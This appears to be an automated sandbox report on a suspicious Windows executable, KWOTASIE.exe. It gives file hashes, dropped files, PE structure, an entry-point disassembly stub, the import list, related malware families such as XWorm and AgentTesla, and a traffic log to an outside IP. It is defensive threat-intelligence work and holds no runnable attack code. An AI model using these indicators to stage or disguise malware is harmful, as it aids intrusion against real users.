- Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description |
---|---|---|
02:13:37 | API Interceptor | |
02:14:33 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
208.95.112.1 | Get hash | malicious | XWorm | Browse |
| |
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse |
| ||
Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse |
| ||
Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
ip-api.com | Get hash | malicious | XWorm | Browse |
| |
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse |
| ||
Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse |
| ||
Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
bg.microsoft.map.fastly.net | Get hash | malicious | Remcos, GuLoader | Browse |
| |
Get hash | malicious | CryptOne, Vidar | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CKL1-ASNKE | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
xneeloZA | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Mirai, Gafgyt | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
TUT-ASUS | Get hash | malicious | XWorm | Browse |
| |
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse |
| ||
Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse |
| ||
Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
|
Process: | C:\Users\user\Desktop\KWOTASIE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 301672 |
Entropy (8bit): | 7.7512997637002945 |
Encrypted: | false |
SSDEEP: | 6144:rrNi8ksyxJSl71bC5jwYo7pT+hvRp5qdJt7oNkfU5ukZG:rpi8++1ObodT+15qdJMk85uB |
MD5: | AF97A27E9A77A40937410A3F779CDDAC |
SHA1: | 6A3422BE55263976FA91D7A0F998AA74A5280E98 |
SHA-256: | 5022B68F80E7FE5AAB1D8F15EEEADCF111A0000D890E855E73D083B5A872C0E4 |
SHA-512: | 6A8FD4BF40BD6EE2BE51BE4DB5ED5F7E57DCC1E559BA02FC19DEB4374E21B985769003C7FBFCCE2B058A7E2F006CE5158E61F238A995D6DAEA45C3CF81AE287C |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\KWOTASIE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 78801 |
Entropy (8bit): | 5.142588222775932 |
Encrypted: | false |
SSDEEP: | 1536:o4Xtl8Bpx+qzIB9Sx/+6/3qt9S22qj39sL+NzfrR4LDmeOy9E4ilV6Jsp:ouULzIB9Bw3q2DL+l+me5036Cp |
MD5: | 31A731AA8D5E8D9C0A5187FF85A83CFF |
SHA1: | BBD52C93350D12B643F854D05F6156444A8FE30D |
SHA-256: | E2E9D9772728BC5C3272C18A0A4031104C88C0B8CF9507834A6881499BA12912 |
SHA-512: | 9A7E3FE4EAEC8D6C47249C0E404CDD5A621B6528B978BC5E68BB3ED4E53AD5B8B6AFE4CF9898214247E746603B387FDF4253FD4E300C655B1025F3C616CAF4E3 |
Malicious: | true |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\KWOTASIE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 936997 |
Entropy (8bit): | 0.298558099617445 |
Encrypted: | false |
SSDEEP: | 768:rtdyfSIjRWNERrlhGOR7gj7q9I+fZAowJIkf/nhJVPSiYLpZfuh6+LIG8Ynqr82q:T |
MD5: | 4E084DB2E273E4A59020BBC29508AE81 |
SHA1: | D868209019D2A9D9A26B1F227F04EB9B219693E3 |
SHA-256: | C083DD714E70F5CC134C4089592E54B59AB41EEAF39C5B4E8790DD833AE44D3E |
SHA-512: | C4CE5667908CEBE9EBD8D522A0EBEB22FEEA74660D50C2A455BFC725E622AADD74A7BA19A2B8049A13CFA549C35FD222D7E953F82F5040CD6A087804686783E1 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\KWOTASIE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1213326 |
Entropy (8bit): | 0.29589819793966354 |
Encrypted: | false |
SSDEEP: | 768:dA50+8EyTM35Je5aQLw16j5nQstwU+4Ub4oKHJZTdyreO+R3obqx1FALllowV+ZF:VwD |
MD5: | 6EC2BDAD06DDD76E3F6C1925058D2B73 |
SHA1: | 4B5917C22D4742C3E633DEEEFE9C372B889B4D5F |
SHA-256: | 499C692019159C75D35F57BBA7424DA053F2E7E514A879CBB49EF80B1E1758EA |
SHA-512: | 0B847802F35711747788003BFB1CA9042CED842D9512FF3E5549DD68BABA81932F03F90E1FD152B4F83482FB077AE0FD15D54E84FEBB4D4FA00AA22203D37A75 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\KWOTASIE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 453 |
Entropy (8bit): | 4.303279922517871 |
Encrypted: | false |
SSDEEP: | 12:+MypCFpoUASwD4bVTNXoRL8u9EEW7rJCwrxjaH8n:+MypCf9AHeVNSFEE+rJCwr93n |
MD5: | C54B2D7A94C9CFAA7CD36FBC7657E98C |
SHA1: | 3B176E45475756E5F5CBD08EECD767BDC8A3A7F4 |
SHA-256: | 3192D10054DBD993F7040DD679E45C1EEDFC5957C460A0DC5258E3DE347A1FFC |
SHA-512: | 6647715D729BDB5A3C725146BA54980A349C7AB193D1D6C1F461D0697B290ECBB6E1DA6F09CFA7448E4D034B2981940880F456295E8FA05CF4C577E7396F6534 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\KWOTASIE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1323921 |
Entropy (8bit): | 0.29486482686325105 |
Encrypted: | false |
SSDEEP: | 768:zgyJwiL1/UO5DVuTBoD+ts/IoOAB3svpD6UMXB64ptzRRMBerLtyIjRFrh6ztQM/:n2WA |
MD5: | F64A268611E960C62221020057669447 |
SHA1: | 6C9C7EAE2CEF81D2368DC5B8E0E222D4EAD7089A |
SHA-256: | E33F853D9809EA1AAA0B32BAEE9249915BBBA63DD7F72A86008E5EC1F335D069 |
SHA-512: | 9356FBB9FCD2B045406A55C9779658F2314651FACC377B62D14ACC3B38E2B26309B1EBCC867AE5021F2B4ABF27BE85DE6E858837E3B940AE696D185462D1F9C4 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\KWOTASIE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 987571 |
Entropy (8bit): | 0.299647195996518 |
Encrypted: | false |
SSDEEP: | 768:DSdZEZwfRWAyMufgApVv+BOXeWOJjNwq+bTEqeYvW+OHLSpgacX52fjWfd++Ler0:GbD |
MD5: | 321496DB5566568354AEE0164FE1711D |
SHA1: | 80A268D40DFCA8EAE08DE8D009853ACB05E299E8 |
SHA-256: | A8049A6F3660DA2F8DDB8E2E804BCB709C7E36085E522679F10EB6419B6CFF2B |
SHA-512: | 51E01D1EA24C66B7A82F65317946CEDCC871D1DE273C5CCCA825C06FA1D16961D9CFCF74E9C7D97DFFE1B26EE18518C323948C00C447BAE2D18584070AD7FC17 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\KWOTASIE.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 722954 |
Entropy (8bit): | 0.30033785621806824 |
Encrypted: | false |
SSDEEP: | 768:tbEIn2OOKGDbP6TfldCh+dtNj4htOuut2g0NTULBEEuzkur2aY:FSc |
MD5: | 97320D366F806D4009691BB49138BC55 |
SHA1: | 45DE76F8B18BA7E7871A13C0B2138A285C985DFD |
SHA-256: | D25C0746F17E0A8BE051818909EFD7340368A0E897493ED2059A8D5C33267871 |
SHA-512: | 2B38DB827EFF9D525316DA0EC02D911F9C37EB0BAA38311169EDA3110AA2F809C33A76FCC6F32931DD380C8BD067DE2344D15A50E53523FB2FA860F65B581AB9 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 8003 |
Entropy (8bit): | 4.840877972214509 |
Encrypted: | false |
SSDEEP: | 192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J |
MD5: | 106D01F562D751E62B702803895E93E0 |
SHA1: | CBF19C2392BDFA8C2209F8534616CCA08EE01A92 |
SHA-256: | 6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D |
SHA-512: | 81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.569090830267937 |
TrID: |
|
File name: | KWOTASIE.exe |
File size: | 982'616 bytes |
MD5: | ecbec21dcfa39a1131d2a79acdf73f88 |
SHA1: | 6b9366674e34118ec2881ab8d0ae5a5f5077a44d |
SHA256: | ca595e27f24e0fc84bd5627ec36baae36bcc24018e638ed2ec7c7a6b1fe7b653 |
SHA512: | 5158aa940a2779ef4fbb4874fbef55135754c33d3370f0c3f807c082dc268a63eab099f03b8b855a65bf41dd3cf683b8284b728719e6935835aa7920a5aa6b9c |
SSDEEP: | 24576:tzBRHciaGiPc8t11WID3jCJO30866tZPIJIRP6n:rRHciaGiL1MU2k3KSAJT |
TLSH: | D8250287FA284192EC0D49F146BF5C67CE15BE2155523B3A6E67BB054DF3022D23B22B |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...p..Y.................d...*..... |
Icon Hash: | 47e132531196311f |
Entrypoint: | 0x40333d |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x597FCC70 [Tue Aug 1 00:33:52 2017 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | b34f154ec913d2d2c435cbd644e91687 |
Signature Valid: | false |
Signature Issuer: | E=Essentializing@Kriminalistiske.Jak, O=Indfjelse, OU="Sammenstuv Hoopla ", CN=Indfjelse, L=Achille, S=Oklahoma, C=US |
Signature Validation Error: | A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider |
Error Number: | -2146762487 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | 2C71F7B674852080C23D98B8870870C8 |
Thumbprint SHA-1: | 4241C59FE0A56B2B1005ED05A2A7841CA1FA8C36 |
Thumbprint SHA-256: | 23D182CC2442C7613AC110B685EB6FEA321A9A18288AD47BBCCE5D311E119308 |
Serial: | 34B5172AADDD4EDF8DF429F5A17EAE8BFEAC0FE8 |
Instruction |
---|
sub esp, 000002D4h |
push ebx |
push esi |
push edi |
push 00000020h |
pop edi |
xor ebx, ebx |
push 00008001h |
mov dword ptr [esp+14h], ebx |
mov dword ptr [esp+10h], 0040A2E0h |
mov dword ptr [esp+1Ch], ebx |
call dword ptr [004080A8h] |
call dword ptr [004080A4h] |
and eax, BFFFFFFFh |
cmp ax, 00000006h |
mov dword ptr [0042A20Ch], eax |
je 00007F4C888BF493h |
push ebx |
call 00007F4C888C2729h |
cmp eax, ebx |
je 00007F4C888BF489h |
push 00000C00h |
call eax |
mov esi, 004082B0h |
push esi |
call 00007F4C888C26A3h |
push esi |
call dword ptr [00408150h] |
lea esi, dword ptr [esi+eax+01h] |
cmp byte ptr [esi], 00000000h |
jne 00007F4C888BF46Ch |
push 0000000Ah |
call 00007F4C888C26FCh |
push 00000008h |
call 00007F4C888C26F5h |
push 00000006h |
mov dword ptr [0042A204h], eax |
call 00007F4C888C26E9h |
cmp eax, ebx |
je 00007F4C888BF491h |
push 0000001Eh |
call eax |
test eax, eax |
je 00007F4C888BF489h |
or byte ptr [0042A20Fh], 00000040h |
push ebp |
call dword ptr [00408044h] |
push ebx |
call dword ptr [004082A0h] |
mov dword ptr [0042A2D8h], eax |
push ebx |
lea eax, dword ptr [esp+34h] |
push 000002B4h |
push eax |
push ebx |
push 004216A8h |
call dword ptr [00408188h] |
push 0040A2C8h |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x60000 | 0x5bba8 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xee5f0 | 0x1868 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x626d | 0x6400 | b2dd5d917f94d75528a11411abe5681c | False | 0.6569921875 | data | 6.423132440637118 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x8000 | 0x138e | 0x1400 | 2914bac53cd4485c9822093463e4eea6 | False | 0.4509765625 | data | 5.146454805063938 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xa000 | 0x20318 | 0x600 | c46c24ddc9bf88a6774bd207204164b9 | False | 0.4921875 | data | 3.906531854842304 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x2b000 | 0x35000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x60000 | 0x5bba8 | 0x5bc00 | e47ef02d4c8809b82823fbc6d27165c4 | False | 0.5386500553474114 | data | 6.341485897093692 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x60328 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | United States | 0.4889265319407048 |
RT_ICON | 0xa2350 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.6356323198864309 |
RT_ICON | 0xb2b78 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.7203589985829003 |
RT_ICON | 0xb6da0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.7454356846473029 |
RT_ICON | 0xb9348 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.7938555347091932 |
RT_ICON | 0xba3f0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.8266393442622951 |
RT_ICON | 0xbad78 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.8714539007092199 |
RT_DIALOG | 0xbb1e0 | 0x140 | data | English | United States | 0.46875 |
RT_DIALOG | 0xbb320 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0xbb440 | 0xc4 | data | English | United States | 0.5918367346938775 |
RT_DIALOG | 0xbb508 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0xbb568 | 0x68 | data | English | United States | 0.7403846153846154 |
RT_VERSION | 0xbb5d0 | 0x294 | OpenPGP Secret Key | English | United States | 0.5106060606060606 |
RT_MANIFEST | 0xbb868 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384 |
DLL | Import |
---|---|
KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW |
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW |
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 2, 2024 08:14:30.690773964 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:30.695559025 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:30.695627928 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:30.695817947 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:30.700532913 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656052113 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656068087 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656081915 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656094074 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656105995 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656116962 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656126976 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656137943 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656147957 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656160116 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656188011 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.656258106 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.661001921 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.661052942 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.661065102 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.661098003 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.661101103 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.661139011 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.661218882 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.890189886 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.890206099 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.890299082 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.890341997 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.890353918 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.890672922 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.890675068 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.890690088 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.890893936 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.890908957 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.890950918 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.890963078 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.891087055 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.891103029 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.891122103 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.891982079 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892034054 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
